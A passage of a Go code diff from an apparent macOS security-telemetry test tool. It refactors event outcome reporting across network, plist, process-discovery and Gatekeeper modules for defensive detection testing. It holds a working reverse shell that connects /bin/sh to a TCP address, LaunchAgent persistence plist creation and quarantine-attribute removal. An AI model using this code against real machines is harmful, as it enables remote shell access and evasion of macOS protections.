-	emit := func(module.TelemetryEvent) {}
+	emit := discardNetworkEvent
 
 	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
 	defer cancel()
@@ -81,7 +81,7 @@ func TestNetListen_DefaultBindsLoopback(t *testing.T) {
 
 func TestNetListen_CustomBindAddr(t *testing.T) {
 	n := &netListen{}
-	emit := func(module.TelemetryEvent) {}
+	emit := discardNetworkEvent
 
 	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
 	defer cancel()

--- a/modules/network/revshell.go
+++ b/modules/network/revshell.go
@@ -2,6 +2,7 @@ package network
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"net"
 	"os/exec"
@@ -45,7 +46,7 @@ func (n *netRevShell) Generate(ctx context.Context, params module.Params, emit m
 	address := net.JoinHostPort(target, port)
 
 	info := n.Info()
-	ev := output.NewEvent(info, "reverse_shell_attempt", false, fmt.Sprintf("connecting /bin/sh to %s", address))
+	ev := output.NewEvent(info, "reverse_shell_attempt", module.OutcomeError, module.Network(address, "", ""), fmt.Sprintf("connecting /bin/sh to %s", address))
 
 	var dialer net.Dialer
 	conn, err := dialer.DialContext(ctx, "tcp", address)
@@ -55,8 +56,7 @@ func (n *netRevShell) Generate(ctx context.Context, params module.Params, emit m
 		}
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		ev.Message = fmt.Sprintf("reverse shell attempt to %s (connection refused — no listener)", address)
-		emit(ev)
-		return nil
+		return emit(ev)
 	}
 	defer func() { _ = conn.Close() }()
 	// Pass the socket descriptor directly. Using net.Conn as an io.Reader
@@ -64,27 +64,31 @@ func (n *netRevShell) Generate(ctx context.Context, params module.Params, emit m
 	// after the shell exits or is killed by cancellation.
 	socket, err := conn.(*net.TCPConn).File()
 	if err != nil {
-		emit(output.WithError(ev, err))
+		if emitErr := emit(output.WithError(ev, err)); emitErr != nil {
+			return errors.Join(err, emitErr)
+		}
 		return err
 	}
 	defer func() { _ = socket.Close() }()
 	cmd := exec.CommandContext(ctx, "/bin/sh")
 	cmd.Stdin, cmd.Stdout, cmd.Stderr = socket, socket, socket
 	if err := cmd.Start(); err != nil {
-		emit(output.WithError(ev, err))
+		if emitErr := emit(output.WithError(ev, err)); emitErr != nil {
+			return errors.Join(err, emitErr)
+		}
 		return err
 	}
 
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("reverse shell connected to %s, spawning /bin/sh", address)
 	ev = output.WithDetails(ev, map[string]any{"address": address, "shell": "/bin/sh"})
-	emit(ev)
+	emitErr := emit(ev)
 
 	err = cmd.Wait()
 	if ctx.Err() != nil {
-		return ctx.Err()
+		return errors.Join(ctx.Err(), emitErr)
 	}
-	return err
+	return errors.Join(err, emitErr)
 }
 
 func (n *netRevShell) DryRun(params module.Params) []string {

--- a/modules/network/revshell_exec_test.go
+++ b/modules/network/revshell_exec_test.go
@@ -32,8 +32,9 @@ func TestRevShellGenerate_ConnectedExecution(t *testing.T) {
 			var events []module.TelemetryEvent
 			g := &netRevShell{}
 			go func() {
-				finished <- g.Generate(ctx, module.Params{"target": host, "port": port}, func(ev module.TelemetryEvent) {
+				finished <- g.Generate(ctx, module.Params{"target": host, "port": port}, func(ev module.TelemetryEvent) error {
 					events = append(events, ev)
+					return nil
 				})
 			}()
 			if err := listener.(*net.TCPListener).SetDeadline(time.Now().Add(3 * time.Second)); err != nil {
@@ -77,7 +78,7 @@ func TestRevShellGenerate_ConnectedExecution(t *testing.T) {
 			case <-time.After(time.Second):
 				t.Fatal("Generate did not finish while the peer remained connected")
 			}
-			if len(events) != 1 || events[0].EventType != "reverse_shell_attempt" || !events[0].Success {
+			if len(events) != 1 || events[0].EventType != "reverse_shell_attempt" || events[0].Outcome != module.OutcomeExecuted {
 				t.Fatalf("events = %+v", events)
 			}
 			if events[0].Details["address"] != listener.Addr().String() {

--- a/modules/network/revshell_test.go
+++ b/modules/network/revshell_test.go
@@ -13,7 +13,7 @@ import (
 func TestNetRevShell_DialRespectsContext(t *testing.T) {
 	n := &netRevShell{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	ctx, cancel := context.WithCancel(context.Background())
 	cancel()
@@ -24,10 +24,10 @@ func TestNetRevShell_DialRespectsContext(t *testing.T) {
 	}
 }
 
-func TestNetRevShell_ConnectionRefusedIsReportedAsSuccess(t *testing.T) {
+func TestNetRevShell_ConnectionRefusedIsReportedAsDenied(t *testing.T) {
 	n := &netRevShell{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	err := n.Generate(context.Background(), module.Params{"target": "127.0.0.1", "port": "1"}, emit)
 	if err != nil {
@@ -36,8 +36,8 @@ func TestNetRevShell_ConnectionRefusedIsReportedAsSuccess(t *testing.T) {
 	if len(events) != 1 {
 		t.Fatalf("expected 1 event, got %d", len(events))
 	}
-	if !events[0].Success {
-		t.Errorf("event.Success = false, want true (connection refused is expected telemetry)")
+	if events[0].Outcome != module.OutcomeDenied {
+		t.Errorf("event.Outcome = %q, want denied", events[0].Outcome)
 	}
 	if !strings.Contains(events[0].Error, "refused") {
 		t.Errorf("event.Error = %q, want it to mention connection refused", events[0].Error)

--- a/modules/network/tls.go
+++ b/modules/network/tls.go
@@ -65,13 +65,12 @@ func tlsConnect(ctx context.Context, info module.ModuleInfo, target string, inse
 		InsecureSkipVerify: insecure,
 	}
 
-	ev := output.NewEvent(info, "tls_connect", false,
+	ev := output.NewEvent(info, "tls_connect", module.OutcomeError, module.Network(target, "", host),
 		fmt.Sprintf("TLS handshake %s (SNI: %s)", target, host))
 
 	tlsDialer := &tls.Dialer{NetDialer: dialer, Config: conf}
 	conn, err := tlsDialer.DialContext(ctx, "tcp", target)
 	if err != nil {
-		ev.Success = true
 		ev.Message = fmt.Sprintf("TLS handshake %s failed (telemetry generated)", target)
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		return output.WithDetails(ev, map[string]any{
@@ -96,7 +95,7 @@ func tlsConnect(ctx context.Context, info module.ModuleInfo, target string, inse
 		details["cert_issuer"] = leaf.Issuer.String()
 	}
 
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("TLS %s to %s, cipher %s",
 		tls.VersionName(state.Version), target, tls.CipherSuiteName(state.CipherSuite))
 	return output.WithDetails(ev, details)
@@ -121,7 +120,9 @@ func (n *netTLS) Generate(ctx context.Context, params module.Params, emit module
 		if err := ctx.Err(); err != nil {
 			return err
 		}
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 	}
 	return nil
 }

--- a/modules/network/tls_exec_test.go
+++ b/modules/network/tls_exec_test.go
@@ -44,7 +44,7 @@ func TestTLSGenerate_Handshakes(t *testing.T) {
 			defer cancel()
 			var events []module.TelemetryEvent
 			mod := &netTLS{}
-			if err := mod.Generate(ctx, params, func(ev module.TelemetryEvent) { events = append(events, ev) }); err != nil {
+			if err := mod.Generate(ctx, params, captureNetworkEvents(&events)); err != nil {
 				t.Fatal(err)
 			}
 			if len(events) != 2 || len(hellos) != 2 {
@@ -54,21 +54,21 @@ func TestTLSGenerate_Handshakes(t *testing.T) {
 				if sni := <-hellos; sni != "localhost" {
 					t.Errorf("server received SNI %q", sni)
 				}
-				if ev.Module != "net_tls" || ev.EventType != "tls_connect" || !ev.Success {
+				if ev.Module != "net_tls" || ev.EventType != "tls_connect" || ev.Outcome == module.OutcomeError {
 					t.Errorf("event = %+v", ev)
 				}
 				if ev.Details["target"] != target || ev.Details["sni"] != "localhost" || ev.Details["insecure"] != insecure {
 					t.Errorf("details = %+v", ev.Details)
 				}
 				if insecure {
-					if ev.ResolvedOutcome() != module.OutcomeExecuted || ev.Error != "" || ev.Details["tls_version"] != "TLS 1.2" {
+					if ev.Outcome != module.OutcomeExecuted || ev.Error != "" || ev.Details["tls_version"] != "TLS 1.2" {
 						t.Errorf("handshake result = %+v", ev)
 					}
 					cipher, _ := ev.Details["cipher_suite"].(string)
 					if !strings.HasPrefix(cipher, "TLS_") || ev.Details["cert_subject"] != ts.Certificate().Subject.String() || ev.Details["cert_issuer"] != ts.Certificate().Issuer.String() {
 						t.Errorf("handshake metadata = %+v", ev.Details)
 					}
-				} else if ev.ResolvedOutcome() != module.OutcomeDenied || ev.Error == "" || ev.Details["tls_version"] != nil {
+				} else if ev.Outcome != module.OutcomeDenied || ev.Error == "" || ev.Details["tls_version"] != nil {
 					t.Errorf("untrusted certificate result = %+v", ev)
 				}
 			}
@@ -108,7 +108,7 @@ func TestTLSGenerate_CancelInFlight(t *testing.T) {
 	}()
 	var events []module.TelemetryEvent
 	start := time.Now()
-	err = (&netTLS{}).Generate(ctx, module.Params{"targets": ln.Addr().String()}, func(ev module.TelemetryEvent) { events = append(events, ev) })
+	err = (&netTLS{}).Generate(ctx, module.Params{"targets": ln.Addr().String()}, captureNetworkEvents(&events))
 	if !errors.Is(err, context.Canceled) || len(events) != 0 {
 		t.Errorf("Generate = %v, events = %+v; want canceled with no completed event", err, events)
 	}
@@ -130,11 +130,12 @@ func TestTLSGenerate_CancelBetweenTargets(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
 	var events []module.TelemetryEvent
-	err := (&netTLS{}).Generate(ctx, module.Params{"targets": addr + "," + addr, "insecure": "true"}, func(ev module.TelemetryEvent) {
+	err := (&netTLS{}).Generate(ctx, module.Params{"targets": addr + "," + addr, "insecure": "true"}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
 		cancel()
+		return nil
 	})
-	if !errors.Is(err, context.Canceled) || len(events) != 1 || events[0].ResolvedOutcome() != module.OutcomeExecuted {
+	if !errors.Is(err, context.Canceled) || len(events) != 1 || events[0].Outcome != module.OutcomeExecuted {
 		t.Fatalf("Generate = %v, events = %+v; want canceled after one handshake", err, events)
 	}
 }
@@ -149,14 +150,14 @@ func TestTLSGenerate_RefusedIsDenied(t *testing.T) {
 		t.Fatal(err)
 	}
 	var events []module.TelemetryEvent
-	if err := (&netTLS{}).Generate(context.Background(), module.Params{"targets": target}, func(ev module.TelemetryEvent) { events = append(events, ev) }); err != nil {
+	if err := (&netTLS{}).Generate(context.Background(), module.Params{"targets": target}, captureNetworkEvents(&events)); err != nil {
 		t.Fatal(err)
 	}
 	if len(events) != 1 {
 		t.Fatalf("got %d events, want 1", len(events))
 	}
 	ev := events[0]
-	if !ev.Success || ev.ResolvedOutcome() != module.OutcomeDenied || ev.Error == "" || ev.Details["target"] != target || ev.Details["tls_version"] != nil {
+	if ev.Outcome != module.OutcomeDenied || ev.Error == "" || ev.Details["target"] != target || ev.Details["tls_version"] != nil {
 		t.Errorf("refused connection = %+v", ev)
 	}
 }
@@ -164,8 +165,9 @@ func TestTLSGenerate_RefusedIsDenied(t *testing.T) {
 func TestTLSGenerate_AlreadyCanceled(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 	cancel()
-	err := (&netTLS{}).Generate(ctx, module.Params{"targets": "127.0.0.1:1"}, func(ev module.TelemetryEvent) {
+	err := (&netTLS{}).Generate(ctx, module.Params{"targets": "127.0.0.1:1"}, func(ev module.TelemetryEvent) error {
 		t.Errorf("already canceled run emitted %+v", ev)
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) {
 		t.Fatalf("Generate = %v, want context.Canceled", err)

--- a/modules/network/tls_test.go
+++ b/modules/network/tls_test.go
@@ -72,7 +72,7 @@ func TestTLSConnect_Handshake(t *testing.T) {
 	if ev.EventType != "tls_connect" {
 		t.Fatalf("event type = %q, want tls_connect", ev.EventType)
 	}
-	if !ev.Success {
+	if ev.Outcome != module.OutcomeExecuted {
 		t.Fatalf("handshake failed: %s", ev.Message)
 	}
 	details := ev.Details
@@ -100,8 +100,8 @@ func TestTLSConnect_RefusedIsTelemetry(t *testing.T) {
 
 	info := (&netTLS{}).Info()
 	ev := tlsConnect(context.Background(), info, addr, true)
-	if !ev.Success {
-		t.Error("refused connection should still report success=true")
+	if ev.Outcome != module.OutcomeDenied {
+		t.Errorf("refused connection outcome = %q, want denied", ev.Outcome)
 	}
 	if ev.Details["tls_version"] != nil {
 		t.Error("refused connection should not have tls_version")

--- a/modules/plist/create.go
+++ b/modules/plist/create.go
@@ -4,6 +4,7 @@ package plistmod
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -85,20 +86,18 @@ func (p *plistCreate) Generate(ctx context.Context, params module.Params, emit m
 		evMsg = fmt.Sprintf("creating plist at %s", outPath)
 	}
 
-	ev := output.NewEvent(info, evAction, false, evMsg)
+	ev := output.NewEvent(info, evAction, module.OutcomeError, module.File(outPath), evMsg)
 	f, err := os.Create(outPath)
 	if err != nil {
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 	enc := plist.NewEncoder(f)
 	enc.Indent("\t")
 	if err := enc.Encode(plistData); err != nil {
 		_ = f.Close()
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 	_ = f.Close()
 	p.createdPath = outPath
@@ -106,16 +105,15 @@ func (p *plistCreate) Generate(ctx context.Context, params module.Params, emit m
 	if mode == "launchagent" {
 		label := params.String("label", bundleID)
 		program := params.String("program", "/usr/bin/true")
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("created LaunchAgent plist at %s (label: %s, program: %s)", outPath, label, program)
 		ev = output.WithDetails(ev, map[string]any{"path": outPath, "label": label, "program": program, "run_at_load": true, "format": "xml"})
 	} else {
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("created plist at %s (bundle ID: %s)", outPath, bundleID)
 		ev = output.WithDetails(ev, map[string]any{"path": outPath, "bundle_id": bundleID, "format": "xml"})
 	}
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (p *plistCreate) DryRun(params module.Params) []string {

--- a/modules/plist/create_test.go
+++ b/modules/plist/create_test.go
@@ -16,7 +16,7 @@ func TestPlistCreate_GenerateAndCleanup(t *testing.T) {
 	outPath := filepath.Join(t.TempDir(), "test.plist")
 	p := &plistCreate{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	params := module.Params{"output_path": outPath, "bundle_id": "com.macnoise.integrationtest"}
 	if err := p.Generate(context.Background(), params, emit); err != nil {
@@ -38,7 +38,7 @@ func TestPlistCreate_GenerateAndCleanup(t *testing.T) {
 
 	var sawSuccess bool
 	for _, ev := range events {
-		if ev.EventType == "plist_create" && ev.Success {
+		if ev.EventType == "plist_create" && ev.Outcome == module.OutcomeExecuted {
 			sawSuccess = true
 		}
 	}
@@ -57,7 +57,7 @@ func TestPlistCreate_GenerateAndCleanup(t *testing.T) {
 func TestPlistCreate_LaunchAgentMode(t *testing.T) {
 	outPath := filepath.Join(t.TempDir(), "agent.plist")
 	p := &plistCreate{}
-	emit := func(module.TelemetryEvent) {}
+	emit := func(module.TelemetryEvent) error { return nil }
 
 	params := module.Params{
 		"output_path": outPath,

--- a/modules/plist/modify.go
+++ b/modules/plist/modify.go
@@ -2,6 +2,7 @@ package plistmod
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os/exec"
 	"strings"
@@ -103,13 +104,15 @@ func (p *plistModify) Generate(ctx context.Context, params module.Params, emit m
 	value := params.String("value", "true")
 	info := p.Info()
 
-	readEv := output.NewEvent(info, "plist_read_prior", false, fmt.Sprintf("reading prior value of %s %s", domain, key))
+	readEv := output.NewEvent(info, "plist_read_prior", module.OutcomeError, module.Resource("preference", domain+":"+key, ""), fmt.Sprintf("reading prior value of %s %s", domain, key))
 	readOut, readErr := exec.CommandContext(ctx, "defaults", "read", domain, key).CombinedOutput()
 	outcome := classifyDefaultsRead(readOut, readErr)
 	if !outcome.safe {
 		readEv = output.WithError(readEv, fmt.Errorf("cannot safely determine prior value of %s %s, refusing to overwrite: %v: %s", domain, key, readErr, strings.TrimSpace(string(readOut))))
-		emit(readEv)
-		return fmt.Errorf("plist_modify: cannot safely determine prior value of %s %s, aborting rather than risk losing it: %w", domain, key, readErr)
+		return errors.Join(
+			fmt.Errorf("plist_modify: cannot safely determine prior value of %s %s, aborting rather than risk losing it: %w", domain, key, readErr),
+			emit(readEv),
+		)
 	}
 
 	p.domain = domain
@@ -117,27 +120,27 @@ func (p *plistModify) Generate(ctx context.Context, params module.Params, emit m
 	p.priorExisted = outcome.existed
 	p.priorValue = outcome.value
 
-	readEv.Success = true
+	readEv.Outcome = module.OutcomeExecuted
 	if outcome.existed {
 		readEv.Message = fmt.Sprintf("%s %s already set, prior value will be restored on cleanup", domain, key)
 	} else {
 		readEv.Message = fmt.Sprintf("%s %s not set, key will be removed on cleanup", domain, key)
 	}
-	emit(readEv)
+	if err := emit(readEv); err != nil {
+		return err
+	}
 
-	writeEv := output.NewEvent(info, "plist_modify", false, fmt.Sprintf("defaults write %s %s %s", domain, key, value))
+	writeEv := output.NewEvent(info, "plist_modify", module.OutcomeError, module.Resource("preference", domain+":"+key, ""), fmt.Sprintf("defaults write %s %s %s", domain, key, value))
 	cmd := exec.CommandContext(ctx, "defaults", "write", domain, key, "-string", value)
 	out, err := cmd.CombinedOutput()
 	if err != nil {
 		writeEv = output.WithError(writeEv, fmt.Errorf("%v: %s", err, out))
-		emit(writeEv)
-		return err
+		return errors.Join(err, emit(writeEv))
 	}
-	writeEv.Success = true
+	writeEv.Outcome = module.OutcomeExecuted
 	writeEv.Message = fmt.Sprintf("defaults write %s %s = %q", domain, key, value)
 	writeEv = output.WithDetails(writeEv, map[string]any{"domain": domain, "key": key, "value": value})
-	emit(writeEv)
-	return nil
+	return emit(writeEv)
 }
 
 func (p *plistModify) DryRun(params module.Params) []string {

--- a/modules/plist/modify_exec_test.go
+++ b/modules/plist/modify_exec_test.go
@@ -49,8 +49,9 @@ func TestPlistModifyGenerate_WriteAndCleanup(t *testing.T) {
 			var events []module.TelemetryEvent
 			ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
 			defer cancel()
-			err := p.Generate(ctx, module.Params{"domain": domain, "key": key, "value": value}, func(ev module.TelemetryEvent) {
+			err := p.Generate(ctx, module.Params{"domain": domain, "key": key, "value": value}, func(ev module.TelemetryEvent) error {
 				events = append(events, ev)
+				return nil
 			})
 			if err != nil {
 				t.Fatalf("Generate: %v", err)
@@ -58,8 +59,8 @@ func TestPlistModifyGenerate_WriteAndCleanup(t *testing.T) {
 			if got := defaultsCommand(t, "read", domain, key); got != value {
 				t.Errorf("written value = %q, want %q", got, value)
 			}
-			if len(events) != 2 || events[0].EventType != "plist_read_prior" || !events[0].Success ||
-				events[1].EventType != "plist_modify" || !events[1].Success {
+			if len(events) != 2 || events[0].EventType != "plist_read_prior" || events[0].Outcome != module.OutcomeExecuted ||
+				events[1].EventType != "plist_modify" || events[1].Outcome != module.OutcomeExecuted {
 				t.Fatalf("events = %+v, want successful read then write", events)
 			}
 			for k, want := range map[string]string{"domain": domain, "key": key, "value": value} {
@@ -101,15 +102,16 @@ func TestPlistModifyGenerate_RunID(t *testing.T) {
 	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
 	defer cancel()
 	var events []module.TelemetryEvent
-	if err := p.Generate(module.ContextWithRunID(ctx, runID), module.Params{"domain": domain}, func(ev module.TelemetryEvent) {
+	if err := p.Generate(module.ContextWithRunID(ctx, runID), module.Params{"domain": domain}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
+		return nil
 	}); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
 	if got := defaultsCommand(t, "read", stamped, "MacnoiseTest"); got != "true" {
 		t.Errorf("stamped default value = %q, want true", got)
 	}
-	if len(events) != 2 || events[1].Details["domain"] != stamped || !events[1].Success {
+	if len(events) != 2 || events[1].Details["domain"] != stamped || events[1].Outcome != module.OutcomeExecuted {
 		t.Errorf("events = %+v, want successful write to stamped domain", events)
 	}
 	if err := p.Cleanup(context.Background()); err != nil {
@@ -133,13 +135,14 @@ func TestPlistModifyGenerate_RefusesComplexValues(t *testing.T) {
 			var events []module.TelemetryEvent
 			ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
 			defer cancel()
-			err := p.Generate(ctx, module.Params{"domain": domain, "key": "Target"}, func(ev module.TelemetryEvent) {
+			err := p.Generate(ctx, module.Params{"domain": domain, "key": "Target"}, func(ev module.TelemetryEvent) error {
 				events = append(events, ev)
+				return nil
 			})
 			if err == nil {
 				t.Error("Generate succeeded, want refusal")
 			}
-			if len(events) != 1 || events[0].EventType != "plist_read_prior" || events[0].Success || events[0].Error == "" {
+			if len(events) != 1 || events[0].EventType != "plist_read_prior" || events[0].Outcome != module.OutcomeError || events[0].Error == "" {
 				t.Errorf("events = %+v, want failed prior read only", events)
 			}
 			if err := p.Cleanup(context.Background()); err != nil {

--- a/modules/process/discovery.go
+++ b/modules/process/discovery.go
@@ -99,21 +99,23 @@ func (p *procDiscovery) Generate(ctx context.Context, params module.Params, emit
 		default:
 		}
 
-		ev := output.NewEvent(info, "system_discovery", false, fmt.Sprintf("running: %s", cmd))
+		ev := output.NewEvent(info, "system_discovery", module.OutcomeError, module.Process("sh", "/bin/sh", cmd, 0), fmt.Sprintf("running: %s", cmd))
 		out, err := exec.CommandContext(ctx, "sh", "-c", cmd).CombinedOutput()
 		if ctx.Err() != nil {
 			return ctx.Err()
 		}
 		if err != nil {
-			ev.Success = true
+			ev.Outcome = module.OutcomeExecuted
 			ev.Message = fmt.Sprintf("discovery command returned error: %s", cmd)
 			ev = output.WithDetails(ev, map[string]any{"command": cmd, "output": string(out), "error": err.Error()})
 		} else {
-			ev.Success = true
+			ev.Outcome = module.OutcomeExecuted
 			ev.Message = fmt.Sprintf("discovery command completed: %s", cmd)
 			ev = output.WithDetails(ev, map[string]any{"command": cmd, "output": string(out)})
 		}
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 	}
 	return nil
 }

--- a/modules/process/discovery_exec_test.go
+++ b/modules/process/discovery_exec_test.go
@@ -28,8 +28,9 @@ func TestDiscoveryGenerate_Commands(t *testing.T) {
 	}
 	var events []module.TelemetryEvent
 	p := &procDiscovery{}
-	err := p.Generate(ctx, module.Params{"commands": " , " + strings.Join(commands, " , , ") + ", "}, func(ev module.TelemetryEvent) {
+	err := p.Generate(ctx, module.Params{"commands": " , " + strings.Join(commands, " , , ") + ", "}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
+		return nil
 	})
 	if err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -38,7 +39,7 @@ func TestDiscoveryGenerate_Commands(t *testing.T) {
 		t.Fatalf("got %d events, want %d: %+v", len(events), len(commands), events)
 	}
 	for i, ev := range events {
-		if ev.Module != "proc_discovery" || ev.EventType != "system_discovery" || !ev.Success {
+		if ev.Module != "proc_discovery" || ev.EventType != "system_discovery" || ev.Outcome != module.OutcomeExecuted {
 			t.Errorf("event %d: %+v", i, ev)
 		}
 		if ev.Details["command"] != commands[i] {
@@ -71,8 +72,9 @@ func TestDiscoveryGenerate_CanceledBeforeCommand(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 	cancel()
 	marker := filepath.Join(t.TempDir(), "unexpected")
-	err := (&procDiscovery{}).Generate(ctx, module.Params{"commands": fmt.Sprintf("touch '%s'", marker)}, func(ev module.TelemetryEvent) {
+	err := (&procDiscovery{}).Generate(ctx, module.Params{"commands": fmt.Sprintf("touch '%s'", marker)}, func(ev module.TelemetryEvent) error {
 		t.Errorf("unexpected event: %+v", ev)
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) {
 		t.Fatalf("Generate = %v, want context.Canceled", err)
@@ -87,9 +89,10 @@ func TestDiscoveryGenerate_CanceledBetweenCommands(t *testing.T) {
 	defer cancel()
 	marker := filepath.Join(t.TempDir(), "unexpected")
 	var events []module.TelemetryEvent
-	err := (&procDiscovery{}).Generate(ctx, module.Params{"commands": fmt.Sprintf("printf first,touch '%s'", marker)}, func(ev module.TelemetryEvent) {
+	err := (&procDiscovery{}).Generate(ctx, module.Params{"commands": fmt.Sprintf("printf first,touch '%s'", marker)}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
 		cancel()
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) {
 		t.Fatalf("Generate = %v, want context.Canceled", err)
@@ -118,8 +121,9 @@ func TestDiscoveryGenerate_CanceledDuringCommand(t *testing.T) {
 			done := make(chan error, 1)
 			go func() {
 				// exec leaves no descendant holding the output pipe after cancellation.
-				done <- (&procDiscovery{}).Generate(ctx, module.Params{"commands": fmt.Sprintf("printf started > '%s'; exec sleep 10", marker)}, func(ev module.TelemetryEvent) {
+				done <- (&procDiscovery{}).Generate(ctx, module.Params{"commands": fmt.Sprintf("printf started > '%s'; exec sleep 10", marker)}, func(ev module.TelemetryEvent) error {
 					events = append(events, ev)
+					return nil
 				})
 			}()
 			// Always reap the command before inspecting events or removing its directory.

--- a/modules/process/gatekeeper.go
+++ b/modules/process/gatekeeper.go
@@ -2,6 +2,7 @@ package process
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"os/exec"
@@ -52,10 +53,9 @@ func (p *procGatekeeper) Generate(ctx context.Context, params module.Params, emi
 	info := p.Info()
 
 	if err := os.WriteFile(targetPath, []byte("macnoise gatekeeper test\n"), 0o644); err != nil {
-		ev := output.NewEvent(info, "test_file_create_fail", false, fmt.Sprintf("failed to create test file %s", targetPath))
+		ev := output.NewEvent(info, "test_file_create_fail", module.OutcomeError, module.File(targetPath), fmt.Sprintf("failed to create test file %s", targetPath))
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 
 	// The quarantine value's agent field carries the run ID so a consumer can
@@ -64,43 +64,47 @@ func (p *procGatekeeper) Generate(ctx context.Context, params module.Params, emi
 	if runID != "" {
 		quarantineVal = "0081;00000000;macnoise-" + runID + ";"
 	}
-	setEv := output.NewEvent(info, "xattr_quarantine_set", false, fmt.Sprintf("setting quarantine xattr on %s", targetPath))
+	setEv := output.NewEvent(info, "xattr_quarantine_set", module.OutcomeError, module.File(targetPath), fmt.Sprintf("setting quarantine xattr on %s", targetPath))
 	setOut, setErr := exec.CommandContext(ctx, "xattr", "-w", "com.apple.quarantine", quarantineVal, targetPath).CombinedOutput()
 	if setErr != nil {
 		setEv = output.WithError(setEv, fmt.Errorf("%v: %s", setErr, setOut))
-		emit(setEv)
+		if err := emit(setEv); err != nil {
+			return err
+		}
 	} else {
-		setEv.Success = true
+		setEv.Outcome = module.OutcomeExecuted
 		setEv.Message = fmt.Sprintf("set com.apple.quarantine on %s", targetPath)
 		setEv = output.WithDetails(setEv, map[string]any{"path": targetPath, "action": "set", "xattr": "com.apple.quarantine"})
-		emit(setEv)
+		if err := emit(setEv); err != nil {
+			return err
+		}
 
-		rmEv := output.NewEvent(info, "xattr_quarantine_remove", false, fmt.Sprintf("removing quarantine xattr from %s", targetPath))
+		rmEv := output.NewEvent(info, "xattr_quarantine_remove", module.OutcomeError, module.File(targetPath), fmt.Sprintf("removing quarantine xattr from %s", targetPath))
 		rmOut, rmErr := exec.CommandContext(ctx, "xattr", "-d", "com.apple.quarantine", targetPath).CombinedOutput()
 		if rmErr != nil {
 			rmEv = output.WithError(rmEv, fmt.Errorf("%v: %s", rmErr, rmOut))
 		} else {
-			rmEv.Success = true
+			rmEv.Outcome = module.OutcomeExecuted
 			rmEv.Message = fmt.Sprintf("removed com.apple.quarantine from %s", targetPath)
 			rmEv = output.WithDetails(rmEv, map[string]any{"path": targetPath, "action": "remove", "xattr": "com.apple.quarantine"})
 		}
-		emit(rmEv)
+		if err := emit(rmEv); err != nil {
+			return err
+		}
 	}
 
-	spctlEv := output.NewEvent(info, "spctl_status_check", false, "checking Gatekeeper status via spctl --status")
+	spctlEv := output.NewEvent(info, "spctl_status_check", module.OutcomeError, module.Process("spctl", "/usr/sbin/spctl", "spctl --status", 0), "checking Gatekeeper status via spctl --status")
 	spctlOut, spctlErr := exec.CommandContext(ctx, "spctl", "--status").CombinedOutput()
 	if spctlErr != nil {
-		spctlEv.Success = true
+		spctlEv.Outcome = module.OutcomeExecuted
 		spctlEv.Message = "Gatekeeper status check returned error (expected on some configs)"
 		spctlEv = output.WithDetails(spctlEv, map[string]any{"output": string(spctlOut), "error": spctlErr.Error()})
 	} else {
-		spctlEv.Success = true
+		spctlEv.Outcome = module.OutcomeExecuted
 		spctlEv.Message = fmt.Sprintf("Gatekeeper status: %s", strings.TrimSpace(string(spctlOut)))
 		spctlEv = output.WithDetails(spctlEv, map[string]any{"output": string(spctlOut)})
 	}
-	emit(spctlEv)
-
-	return nil
+	return emit(spctlEv)
 }
 
 func (p *procGatekeeper) DryRun(params module.Params) []string {

--- a/modules/process/gatekeeper_integration_test.go
+++ b/modules/process/gatekeeper_integration_test.go
@@ -17,7 +17,7 @@ func TestGatekeeperGenerate_FullCycle(t *testing.T) {
 	target := filepath.Join(t.TempDir(), "gk_target")
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureProcessEvents(&events)
 	p := &procGatekeeper{}
 	ctx := module.ContextWithRunID(context.Background(), "gkrun7")
 	if err := p.Generate(ctx, module.Params{"target_path": target}, emit); err != nil {
@@ -37,10 +37,10 @@ func TestGatekeeperGenerate_FullCycle(t *testing.T) {
 	}
 
 	set := byType["xattr_quarantine_set"]
-	if !set.Success {
